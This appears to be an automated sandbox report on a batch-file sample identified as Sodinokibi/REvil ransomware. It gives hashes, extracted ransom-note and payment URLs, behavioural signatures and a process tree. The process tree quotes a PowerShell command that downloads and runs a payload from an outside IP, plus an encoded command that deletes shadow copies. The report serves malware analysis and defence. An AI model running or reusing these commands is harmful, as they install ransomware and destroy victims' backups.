Analysis
-
max time kernel
128s -
max time network
59s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
12-06-2020 14:10
Static task
static1
Behavioral task
behavioral1
Sample
e311ca0dbd0eb9014f1e66e9c74a7634.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
e311ca0dbd0eb9014f1e66e9c74a7634.bat
Resource
win10v200430
General
-
Target
e311ca0dbd0eb9014f1e66e9c74a7634.bat
-
Size
213B
-
MD5
40fe3c2a1ab5a72052998d4af7cff154
-
SHA1
4dff0fbc5e91e076066f61c666c1a7da294e0d33
-
SHA256
c9587e50149d6b16f99a0ec810f89670c4e75cc8610641973f55796712ad8fb8
-
SHA512
bca3682a5e819a086ef4102fd599fe8ea60d5737c005274af710a378054da7f4251e719b1ad8c799b6d50b51787fc7ce81956a7f3f5f6f533f0c0c403a19d280
Malware Config
Extracted
http://185.103.242.78/pastes/e311ca0dbd0eb9014f1e66e9c74a7634
Extracted
C:\9402gukj-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/2F06AC9FA31C1D27
http://decryptor.cc/2F06AC9FA31C1D27
Signatures
-
Suspicious behavior: EnumeratesProcesses 77 IoCs
Processes:
powershell.exepowershell.exepid process 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 660 powershell.exe 660 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1624 powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1052 wrote to memory of 1624 1052 cmd.exe powershell.exe PID 1624 wrote to memory of 660 1624 powershell.exe powershell.exe PID 1624 wrote to memory of 660 1624 powershell.exe powershell.exe PID 1624 wrote to memory of 660 1624 powershell.exe powershell.exe PID 1624 wrote to memory of 660 1624 powershell.exe powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Drops file in Program Files directory 42 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\DismountResolve.aiff powershell.exe File created \??\c:\program files (x86)\9402gukj-readme.txt powershell.exe File opened for modification \??\c:\program files\CloseOptimize.ex_ powershell.exe File opened for modification \??\c:\program files\CloseSubmit.mhtml powershell.exe File opened for modification \??\c:\program files\CloseConvertTo.M2V powershell.exe File opened for modification \??\c:\program files\ExitBlock.mpp powershell.exe File opened for modification \??\c:\program files\ExitStep.css powershell.exe File opened for modification \??\c:\program files\InstallSelect.aiff powershell.exe File opened for modification \??\c:\program files\RegisterConvert.wav powershell.exe File opened for modification \??\c:\program files\UnprotectClose.TS powershell.exe File created \??\c:\program files\9402gukj-readme.txt powershell.exe File opened for modification \??\c:\program files\CompressPush.html powershell.exe File opened for modification \??\c:\program files\ConvertUnprotect.jpeg powershell.exe File opened for modification \??\c:\program files\UnblockConvertTo.m4v powershell.exe File opened for modification \??\c:\program files\RegisterProtect.xlsb powershell.exe File opened for modification \??\c:\program files\ResumeBlock.crw powershell.exe File opened for modification \??\c:\program files\SwitchReceive.jpg powershell.exe File opened for modification \??\c:\program files\ProtectAssert.rtf powershell.exe File opened for modification \??\c:\program files\ResumeUse.png powershell.exe File opened for modification \??\c:\program files\SyncRestore.tif powershell.exe File opened for modification \??\c:\program files\AddWatch.pot powershell.exe File opened for modification \??\c:\program files\ExpandResume.mpg powershell.exe File opened for modification \??\c:\program files\ImportGrant.mpg powershell.exe File opened for modification \??\c:\program files\MeasureFind.txt powershell.exe File opened for modification \??\c:\program files\NewSync.rar powershell.exe File opened for modification \??\c:\program files\ResolveSend.xht powershell.exe File opened for modification \??\c:\program files\SelectMeasure.3g2 powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\9402gukj-readme.txt powershell.exe File opened for modification \??\c:\program files\CheckpointLock.tif powershell.exe File opened for modification \??\c:\program files\CompareConfirm.png powershell.exe File opened for modification \??\c:\program files\HideCompare.potm powershell.exe File opened for modification \??\c:\program files\ImportSkip.xml powershell.exe File created \??\c:\program files\microsoft sql server compact edition\9402gukj-readme.txt powershell.exe File opened for modification \??\c:\program files\SelectRegister.mp4v powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\9402gukj-readme.txt powershell.exe File opened for modification \??\c:\program files\ClearExit.vdx powershell.exe File opened for modification \??\c:\program files\ExitSuspend.7z powershell.exe File opened for modification \??\c:\program files\GrantSkip.dwg powershell.exe File opened for modification \??\c:\program files\UnpublishSplit.vsd powershell.exe File opened for modification \??\c:\program files\ProtectImport.bmp powershell.exe File opened for modification \??\c:\program files\UnlockWatch.3gp powershell.exe File opened for modification \??\c:\program files\UnprotectOpen.vbe powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\5l212d.bmp" powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1624 powershell.exe Token: SeDebugPrivilege 1624 powershell.exe Token: SeDebugPrivilege 660 powershell.exe Token: SeBackupPrivilege 1644 vssvc.exe Token: SeRestorePrivilege 1644 vssvc.exe Token: SeAuditPrivilege 1644 vssvc.exe Token: SeTakeOwnershipPrivilege 1624 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 4 1624 powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\e311ca0dbd0eb9014f1e66e9c74a7634.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1052 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/e311ca0dbd0eb9014f1e66e9c74a7634');Invoke-EACMHY;Start-Sleep -s 10000"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
- Drops file in Program Files directory
- Sets desktop wallpaper using registry
- Suspicious use of AdjustPrivilegeToken
- Blacklisted process makes network request
PID:1624 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:660
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1644